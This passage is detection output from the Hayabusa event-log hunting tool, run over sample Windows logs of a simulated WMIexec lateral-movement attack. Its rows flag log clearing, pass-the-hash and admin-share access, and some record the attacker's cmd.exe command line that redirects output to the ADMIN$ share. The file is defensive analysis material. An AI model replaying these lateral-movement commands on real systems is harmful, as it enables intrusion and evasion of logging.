Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-26 08:25:31.043 +00:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.560 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.560 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.560 +00:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.584 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.584 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 08:25:36.686 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.686 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.852 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.852 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.913 +00:00,srvdefender01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:36.913 +00:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec 
execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_builtin/proc_creation_win_wmiprvse_spawning_process.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.258 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0xd44 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.307 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.313 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.325 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.329 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.332 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.335 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 08:25:37.338 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.342 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.344 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.348 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.350 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 
10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.354 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.356 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.360 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.363 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec 
execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.367 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.369 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.373 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.375 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.379 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | 
LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.381 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.385 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.385 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.388 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 08:25:37.391 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.392 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.392 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.394 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:37.399 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: 
__1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.406 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.409 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.418 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.420 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,high,,Hermetic Wiper TG Process Patterns,,rules/sigma/process_creation_builtin/proc_creation_win_mal_hermetic_wiper_activity.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_builtin/proc_creation_win_wmiprvse_spawning_process.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.435 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x1b98 | User: SRVDEFENDER01$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.440 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 
08:25:38.450 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.452 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.456 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.458 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.462 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.463 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.463 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.464 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.479 +00:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:25:38.481 +00:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 08:26:03.004 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script 